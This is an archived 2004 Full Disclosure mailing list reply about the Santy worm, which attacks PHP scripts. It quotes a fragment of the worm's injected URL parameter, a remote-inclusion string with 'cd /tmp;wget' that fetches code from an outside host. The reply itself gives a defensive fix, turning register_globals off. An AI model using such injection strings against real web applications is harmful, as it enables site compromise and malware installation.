Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: New Santy-Worm attacks *all* PHP-skripts
From: Pekka Savola <pekkas () netcore fi>
Date: Sat, 25 Dec 2004 21:59:50 +0200 (EET)

On Sat, 25 Dec 2004, Juergen Schmidt wrote:
It uses the brasilian Google site to find all kinds of PHP skripts.
It parses their URLs and overwrites variables with strings like:

'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget

And AFAICS, this can be prevented by setting register_globals=off in php.ini.

Pekka Savola                 "You each name yourselves king, yet the
Netcore Oy                    kingdom bleeds."
Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]